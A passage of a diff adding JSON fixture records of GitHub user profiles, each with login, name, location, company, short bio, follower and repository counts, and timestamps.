+ "bio": "Be kind", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2036, + "fields": { + "nest_created_at": "2024-09-12T00:33:47.335Z", + "nest_updated_at": "2024-09-12T00:33:47.335Z", + "name": "Rafal Kasa", + "login": "rafalkasa", + "email": "rafalkasa@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/19885116?v=4", + "company": "", + "location": "Warsaw / Poland", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 26, + "public_gists_count": 2, + "public_repositories_count": 36, + "created_at": "2016-06-12T05:40:04Z", + "updated_at": "2024-08-14T19:14:48Z", + "node_id": "MDQ6VXNlcjE5ODg1MTE2", + "bio": "I born as a programmer, I started write code on C64 when I was 11 years old. Now I have 18 year experience in software industry ", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2037, + "fields": { + "nest_created_at": "2024-09-12T00:33:50.186Z", + "nest_updated_at": "2024-09-12T00:33:50.186Z", + "name": "HumanG33k", + "login": "HumanG33k", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1794193?v=4", + "company": "Wild Turtles", + "location": "France Poitiers", + "collaborators_count": 0, + "following_count": 533, + "followers_count": 38, + "public_gists_count": 12, + "public_repositories_count": 119, + "created_at": "2012-05-30T15:39:49Z", + "updated_at": "2024-08-26T18:23:04Z", + "node_id": "MDQ6VXNlcjE3OTQxOTM=", + "bio": "Most of our dev are done on our forgejo.", + "is_hireable": false, + "twitter_username": "Wild_Turtles" + } +}, +{ + "model": "github.user", + "pk": 2038, + "fields": { + "nest_created_at": "2024-09-12T00:33:57.109Z", + "nest_updated_at": "2024-09-12T00:33:57.109Z", + "name": "Merl J Creps", + "login": "mcrepssdi", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/87571937?v=4", + "company": "Steel Dynamics ", + "location": "Delta Ohio", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 15, + "created_at": "2021-07-17T13:06:11Z", + "updated_at": "2024-09-11T08:42:07Z", + "node_id": "MDQ6VXNlcjg3NTcxOTM3", + "bio": "Senior Software Engineer", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2039, + "fields": { + "nest_created_at": "2024-09-12T00:34:01.184Z", + "nest_updated_at": "2024-09-12T00:34:01.184Z", + "name": "", + "login": "mgonzcast", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/63349279?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 3, + "public_repositories_count": 3, + "created_at": "2020-04-08T11:32:53Z", + "updated_at": "2024-08-29T19:22:42Z", + "node_id": "MDQ6VXNlcjYzMzQ5Mjc5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2040, + "fields": { + "nest_created_at": "2024-09-12T00:34:02.386Z", + "nest_updated_at": "2024-09-12T00:34:02.386Z", + "name": "Martin", + "login": "amfleurke", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3415426?v=4", + "company": "Portavita", + "location": "Amsterdam", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2013-01-29T09:43:43Z", + "updated_at": "2024-02-14T13:57:05Z", + "node_id": "MDQ6VXNlcjM0MTU0MjY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2041, + "fields": { + "nest_created_at": "2024-09-12T00:34:03.641Z", + "nest_updated_at": "2024-09-12T00:34:45.382Z", + "name": "", + "login": "Muskan-0618", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/111416488?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2022-08-17T06:48:58Z", + "updated_at": "2024-06-04T08:53:30Z", + "node_id": "U_kgDOBqQUqA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2042, + "fields": { + "nest_created_at": "2024-09-12T00:34:05.271Z", + "nest_updated_at": "2024-09-12T00:34:05.271Z", + "name": "Elias Müller", + "login": "eliasmueller", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/63012534?v=4", + "company": "", + "location": "Germany", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 7, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2020-04-01T17:30:07Z", + "updated_at": "2024-05-22T14:16:55Z", + "node_id": "MDQ6VXNlcjYzMDEyNTM0", + "bio": "Software Engineer ", + "is_hireable": false, + "twitter_username": "eliasbndkt" + } +}, +{ + "model": "github.user", + "pk": 2043, + "fields": { + "nest_created_at": "2024-09-12T00:34:06.876Z", + "nest_updated_at": "2024-09-12T00:34:19.147Z", + "name": "Samet Yilmaz", + "login": "sametr35", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/98058266?v=4", + "company": "PurpleBox Inc.", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 13, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2022-01-19T21:02:17Z", + "updated_at": "2024-08-09T17:01:05Z", + "node_id": "U_kgDOBdhAGg", + "bio": "Application Security Engineer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2044, + "fields": { + "nest_created_at": "2024-09-12T00:34:08.124Z", + "nest_updated_at": "2024-09-12T00:34:08.124Z", + "name": "SuperPat", + "login": "SuperPat45", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7791600?v=4", + "company": "", + "location": "France", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2014-06-04T08:59:42Z", + "updated_at": "2024-07-22T09:06:02Z", + "node_id": "MDQ6VXNlcjc3OTE2MDA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2045, + "fields": { + "nest_created_at": "2024-09-12T00:34:09.336Z", + "nest_updated_at": "2024-09-12T00:34:09.336Z", + "name": "", + "login": "cda2024", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/161817375?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-03-01T08:31:35Z", + "updated_at": "2024-08-13T12:57:53Z", + "node_id": "U_kgDOCaUjHw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2046, + "fields": { + "nest_created_at": "2024-09-12T00:34:11.787Z", + "nest_updated_at": "2024-09-12T00:34:22.097Z", + "name": "", + "login": "Mridula03g", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/85608136?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2021-06-09T07:08:59Z", + "updated_at": "2024-06-26T07:40:08Z", + "node_id": "MDQ6VXNlcjg1NjA4MTM2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2047, + "fields": { + "nest_created_at": "2024-09-12T00:34:13.087Z", + "nest_updated_at": "2024-09-12T00:34:13.087Z", + "name": "", + "login": "AnthonyPomtree", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/162185359?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-03-04T18:39:37Z", + "updated_at": "2024-03-04T18:39:37Z", + "node_id": "U_kgDOCarAjw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2048, + "fields": { + "nest_created_at": "2024-09-12T00:34:14.331Z", + "nest_updated_at": "2024-09-12T00:34:14.331Z", + "name": "Sravana", + "login": "Sravana-Synthesis", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/70380588?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2020-08-28T13:19:32Z", + "updated_at": "2024-07-15T10:17:20Z", + "node_id": "MDQ6VXNlcjcwMzgwNTg4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2049, + "fields": { + "nest_created_at": "2024-09-12T00:34:15.560Z", + "nest_updated_at": "2024-09-12T00:34:16.774Z", + "name": "", + "login": "zhchangqing", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/24227825?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2016-11-28T14:50:20Z", + "updated_at": "2024-03-13T06:43:06Z", + "node_id": "MDQ6VXNlcjI0MjI3ODI1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2050, + "fields": { + "nest_created_at": "2024-09-12T00:34:20.407Z", + "nest_updated_at": "2024-09-12T00:34:20.407Z", + "name": "", + "login": "yyuanxin", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/50551313?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2019-05-12T15:40:36Z", + "updated_at": "2024-07-10T02:24:03Z", + "node_id": "MDQ6VXNlcjUwNTUxMzEz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2051, + "fields": { + "nest_created_at": "2024-09-12T00:34:23.309Z", + "nest_updated_at": "2024-09-22T19:28:19.787Z", + "name": "Eli Fabens", + "login": "efabens", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3656306?v=4", + "company": "", + "location": "Portland, OR", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 31, + "created_at": "2013-02-21T06:15:34Z", + "updated_at": "2024-09-03T11:25:42Z", + "node_id": "MDQ6VXNlcjM2NTYzMDY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2052, + "fields": { + "nest_created_at": "2024-09-12T00:34:24.531Z", + "nest_updated_at": "2024-09-12T00:34:24.531Z", + "name": "", + "login": "jchandler-parsons", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/57921749?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 0, + "created_at": "2019-11-18T21:49:38Z", + "updated_at": "2024-03-21T03:13:04Z", + "node_id": "MDQ6VXNlcjU3OTIxNzQ5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2053, + "fields": { + "nest_created_at": "2024-09-12T00:34:25.783Z", + "nest_updated_at": "2024-09-12T00:34:25.783Z", + "name": "", + "login": "Guntur123", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/34702793?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2017-12-20T05:44:53Z", + "updated_at": "2024-07-23T03:03:17Z", + "node_id": "MDQ6VXNlcjM0NzAyNzkz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2054, + "fields": { + "nest_created_at": "2024-09-12T00:34:28.207Z", + "nest_updated_at": "2024-09-12T00:34:28.207Z", + "name": "", + "login": "levchv", + "email": "levchv@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/5598234?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2013-10-02T20:17:54Z", + "updated_at": "2024-06-14T12:06:12Z", + "node_id": "MDQ6VXNlcjU1OTgyMzQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2055, + "fields": { + "nest_created_at": "2024-09-12T00:34:29.433Z", + "nest_updated_at": "2024-09-22T19:27:59.357Z", + "name": "Chad Wilson", + "login": "chadlwilson", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/29788154?v=4", + "company": "@thoughtworks", + "location": "Singapore", + "collaborators_count": 0, + "following_count": 111, + "followers_count": 94, + "public_gists_count": 6, + "public_repositories_count": 50, + "created_at": "2017-06-30T01:47:24Z", + "updated_at": "2024-09-18T16:00:32Z", + "node_id": "MDQ6VXNlcjI5Nzg4MTU0", + "bio": "Technical principal at Thoughtworks - helping clients deliver distributed architectures. 🥝 in 🇸🇬. All views shared are my own.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2056, + "fields": { + "nest_created_at": "2024-09-12T00:34:32.292Z", + "nest_updated_at": "2024-09-12T00:34:32.292Z", + "name": "Steven Huypens", + "login": "ponziani", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12340042?v=4", + "company": "", + "location": "Belgium", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 15, + "created_at": "2015-05-08T13:09:06Z", + "updated_at": "2024-01-02T15:40:34Z", + "node_id": "MDQ6VXNlcjEyMzQwMDQy", + "bio": "Software engineer with a passion for creating clean, efficient code and building innovative solutions.", + "is_hireable": false, + "twitter_username": "Sjarel" + } +}, +{ + "model": "github.user", + "pk": 2057, + "fields": { + "nest_created_at": "2024-09-12T00:34:33.529Z", + "nest_updated_at": "2024-09-12T00:34:33.529Z", + "name": "", + "login": "shadowjjackson", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/153722872?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-12-13T09:37:58Z", + "updated_at": "2024-03-25T13:35:01Z", + "node_id": "U_kgDOCSmf-A", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2058, + "fields": { + "nest_created_at": "2024-09-12T00:34:34.742Z", + "nest_updated_at": "2024-09-12T00:34:34.742Z", + "name": "Fugitif", + "login": "Teicu", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1572822?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 171, + "followers_count": 25, + "public_gists_count": 3, + "public_repositories_count": 169, + "created_at": "2012-03-25T08:26:26Z", + "updated_at": "2023-06-19T05:32:03Z", + "node_id": "MDQ6VXNlcjE1NzI4MjI=", + "bio": "Security enthusiast, Penetration tester", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2059, + "fields": { + "nest_created_at": "2024-09-12T00:34:36.060Z", + "nest_updated_at": "2024-09-12T00:34:36.060Z", + "name": "Jyotsana Shankar", + "login": "JyotsanaShankar", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/34038698?v=4", + "company": "", + "location": "Bangalore", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2017-11-27T18:09:03Z", + "updated_at": "2024-07-22T08:25:31Z", + "node_id": "MDQ6VXNlcjM0MDM4Njk4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2060, + "fields": { + "nest_created_at": "2024-09-12T00:34:37.265Z", + "nest_updated_at": "2024-09-12T00:34:37.265Z", + "name": "Maya S.", + "login": "amaridev", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13658668?v=4", + "company": "", + "location": "Berlin", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 3, + "public_gists_count": 1, + "public_repositories_count": 0, + "created_at": "2015-08-05T10:42:13Z", + "updated_at": "2024-07-17T11:54:01Z", + "node_id": "MDQ6VXNlcjEzNjU4NjY4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2061, + "fields": { + "nest_created_at": "2024-09-12T00:34:40.087Z", + "nest_updated_at": "2024-09-12T00:34:40.087Z", + "name": "Aliyeva Khalida", + "login": "aliyevakhalida", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/105045412?v=4", + "company": "PASHA Bank OJSC", + "location": "Baku, Azerbaijan", + "collaborators_count": 0, + "following_count": 16, + "followers_count": 9, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2022-05-06T08:40:11Z", + "updated_at": "2024-08-29T21:31:09Z", + "node_id": "U_kgDOBkLdpA", + "bio": "Software Engineer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2062, + "fields": { + "nest_created_at": "2024-09-12T00:34:41.276Z", + "nest_updated_at": "2024-09-12T00:34:41.276Z", + "name": "", + "login": "vmatyus", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/26717393?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 17, + "created_at": "2017-03-27T14:51:44Z", + "updated_at": "2024-09-06T12:59:34Z", + "node_id": "MDQ6VXNlcjI2NzE3Mzkz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2063, + "fields": { + "nest_created_at": "2024-09-12T00:34:44.155Z", + "nest_updated_at": "2024-09-22T19:27:10.535Z", + "name": "Robert Oschwald", + "login": "robertoschwald", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1519879?v=4", + "company": "symentis GmbH", + "location": "Germany", + "collaborators_count": 0, + "following_count": 10, + "followers_count": 16, + "public_gists_count": 18, + "public_repositories_count": 50, + "created_at": "2012-03-09T12:07:53Z", + "updated_at": "2024-07-15T11:11:07Z", + "node_id": "MDQ6VXNlcjE1MTk4Nzk=", + "bio": "toxicum.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2064, + "fields": { + "nest_created_at": "2024-09-12T00:34:46.645Z", + "nest_updated_at": "2024-09-12T00:34:46.645Z", + "name": "Gloria Alfstad", + "login": "alfstglo-fadv", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/46571235?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-01-10T16:32:15Z", + "updated_at": "2024-09-10T19:04:07Z", + "node_id": "MDQ6VXNlcjQ2NTcxMjM1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2065, + "fields": { + "nest_created_at": "2024-09-12T00:34:48.293Z", + "nest_updated_at": "2024-09-12T00:34:48.293Z", + "name": "Alan Czajkowski", + "login": "alan-czajkowski", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3029228?v=4", + "company": "https://openease.com/", + "location": "Toronto, Canada", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2012-12-12T22:55:28Z", + "updated_at": "2024-08-31T01:52:46Z", + "node_id": "MDQ6VXNlcjMwMjkyMjg=", + "bio": "https://www.linkedin.com/in/alanczajkowski/", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2066, + "fields": { + "nest_created_at": "2024-09-12T00:34:49.490Z", + "nest_updated_at": "2024-09-12T00:34:49.490Z", + "name": "Ganbayar Gansukh", + "login": "nomadme", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6267271?v=4", + "company": "", + "location": "Washington, D.C.", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 8, + "public_gists_count": 8, + "public_repositories_count": 20, + "created_at": "2013-12-26T22:46:07Z", + "updated_at": "2024-08-06T15:54:29Z", + "node_id": "MDQ6VXNlcjYyNjcyNzE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2067, + "fields": { + "nest_created_at": "2024-09-12T00:34:50.755Z", + "nest_updated_at": "2024-09-12T00:34:50.755Z", + "name": "", + "login": "vaparnab", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/86321997?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2021-06-22T18:54:40Z", + "updated_at": "2022-03-03T14:17:06Z", + "node_id": "MDQ6VXNlcjg2MzIxOTk3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2068, + "fields": { + "nest_created_at": "2024-09-12T00:34:51.945Z", + "nest_updated_at": "2024-09-12T00:35:00.441Z", + "name": "Tushar", + "login": "tadlakha9", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/51110539?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2019-05-28T06:47:13Z", + "updated_at": "2024-08-27T11:04:51Z", + "node_id": "MDQ6VXNlcjUxMTEwNTM5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2069, + "fields": { + "nest_created_at": "2024-09-12T00:34:53.174Z", + "nest_updated_at": "2024-09-12T00:34:53.174Z", + "name": "", + "login": "Aseem-DevOps", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/126510452?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-02-27T18:25:59Z", + "updated_at": "2024-05-02T07:11:28Z", + "node_id": "U_kgDOB4pldA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2070, + "fields": { + "nest_created_at": "2024-09-12T00:34:54.789Z", + "nest_updated_at": "2024-09-12T00:34:54.789Z", + "name": "Francisco Wilson Rodrigues Júnior", + "login": "wilsoonjunior14", + "email": "wjunior_msn@hotmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/19149664?v=4", + "company": "", + "location": "Recife Pernambuco", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 45, + "created_at": "2016-05-02T12:25:37Z", + "updated_at": "2024-08-06T23:18:48Z", + "node_id": "MDQ6VXNlcjE5MTQ5NjY0", + "bio": "Engenheiro de Computação", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2071, + "fields": { + "nest_created_at": "2024-09-12T00:34:55.576Z", + "nest_updated_at": "2024-09-12T00:34:55.576Z", + "name": "", + "login": "Amrin-Taj", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/75828491?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2020-12-11T06:49:28Z", + "updated_at": "2024-06-12T07:15:04Z", + "node_id": "MDQ6VXNlcjc1ODI4NDkx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2072, + "fields": { + "nest_created_at": "2024-09-12T00:34:56.757Z", + "nest_updated_at": "2024-09-12T00:34:56.757Z", + "name": "Kevin Fries", + "login": "kelfink", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3877861?v=4", + "company": "", + "location": "Sacramento CA", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 6, + "public_gists_count": 10, + "public_repositories_count": 64, + "created_at": "2013-03-15T19:14:25Z", + "updated_at": "2024-08-09T22:07:32Z", + "node_id": "MDQ6VXNlcjM4Nzc4NjE=", + "bio": "Code4Sacramento @code4sac Brigade of Code For America.\r\nFront-end (React, WebCompoonents, Vue)\r\nBack-end ( Rails, Node.js, Java Servlets, RDBMS ", + "is_hireable": false, + "twitter_username": "xelfink" + } +}, +{ + "model": "github.user", + "pk": 2073, + "fields": { + "nest_created_at": "2024-09-12T00:34:59.229Z", + "nest_updated_at": "2024-09-12T00:34:59.229Z", + "name": "Jo Wannenburg", + "login": "johannes-wannenburg-sal", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/82342805?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-04-11T21:33:40Z", + "updated_at": "2024-08-03T21:53:40Z", + "node_id": "MDQ6VXNlcjgyMzQyODA1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2074, + "fields": { + "nest_created_at": "2024-09-12T00:35:01.716Z", + "nest_updated_at": "2024-09-12T00:35:01.716Z", + "name": "Stav Hayoun Noiberg", + "login": "StavHayounNoiberg", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/97242124?v=4", + "company": "", + "location": "Tel Aviv, Israel", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2022-01-06T15:36:12Z", + "updated_at": "2024-08-18T12:29:36Z", + "node_id": "U_kgDOBcvMDA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2075, + "fields": { + "nest_created_at": "2024-09-12T00:35:03.931Z", + "nest_updated_at": "2024-09-12T00:35:03.931Z", + "name": "Veeresh Santhebennur", + "login": "VeereshSSanthebennur", + "email": "codingvee@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/93672991?v=4", + "company": "Aptean", + "location": "Bangalore", + "collaborators_count": 0, + "following_count": 36, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2021-11-03T17:07:44Z", + "updated_at": "2024-05-06T04:33:44Z", + "node_id": "U_kgDOBZVWHw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2076, + "fields": { + "nest_created_at": "2024-09-12T00:35:05.540Z", + "nest_updated_at": "2024-09-12T00:35:05.540Z", + "name": "", + "login": "tasso94", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3015690?v=4", + "company": "@camunda ", + "location": "Berlin", + "collaborators_count": 0, + "following_count": 13, + "followers_count": 24, + "public_gists_count": 0, + "public_repositories_count": 17, + "created_at": "2012-12-11T10:49:32Z", + "updated_at": "2024-08-06T07:09:26Z", + "node_id": "MDQ6VXNlcjMwMTU2OTA=", + "bio": "Senior Full Stack Engineer & Tech Lead @camunda Automation Platform 7", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2077, + "fields": { + "nest_created_at": "2024-09-12T00:35:06.757Z", + "nest_updated_at": "2024-09-12T00:35:06.757Z", + "name": "Stevie G", + "login": "stevieg27", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/48964137?v=4", + "company": "test", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 1, + "public_repositories_count": 102, + "created_at": "2019-03-26T18:53:48Z", + "updated_at": "2024-08-28T12:17:50Z", + "node_id": "MDQ6VXNlcjQ4OTY0MTM3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2078, + "fields": { + "nest_created_at": "2024-09-12T00:35:07.944Z", + "nest_updated_at": "2024-09-12T00:35:07.944Z", + "name": "", + "login": "SwapnaAnchuri", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/169351979?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-05-09T09:40:12Z", + "updated_at": "2024-05-09T09:40:25Z", + "node_id": "U_kgDOChgbKw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2079, + "fields": { + "nest_created_at": "2024-09-12T00:35:11.158Z", + "nest_updated_at": "2024-09-12T00:35:11.158Z", + "name": "Nico Arianto", + "login": "nico-arianto", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6427889?v=4", + "company": "minden.ai", + "location": "Singapore", + "collaborators_count": 0, + "following_count": 70, + "followers_count": 7, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2014-01-17T08:54:50Z", + "updated_at": "2024-07-27T07:46:14Z", + "node_id": "MDQ6VXNlcjY0Mjc4ODk=", + "bio": "Data, Software Engineer, and Software Developer that passionate about the latest software technology and methodology to boost human life", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2080, + "fields": { + "nest_created_at": "2024-09-12T00:35:12.379Z", + "nest_updated_at": "2024-09-12T00:35:12.379Z", + "name": "", + "login": "PrashanthPragadeeswaran", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/148347574?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-10-18T12:31:04Z", + "updated_at": "2024-06-20T09:02:36Z", + "node_id": "U_kgDOCNeatg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2081, + "fields": { + "nest_created_at": "2024-09-12T00:35:14.085Z", + 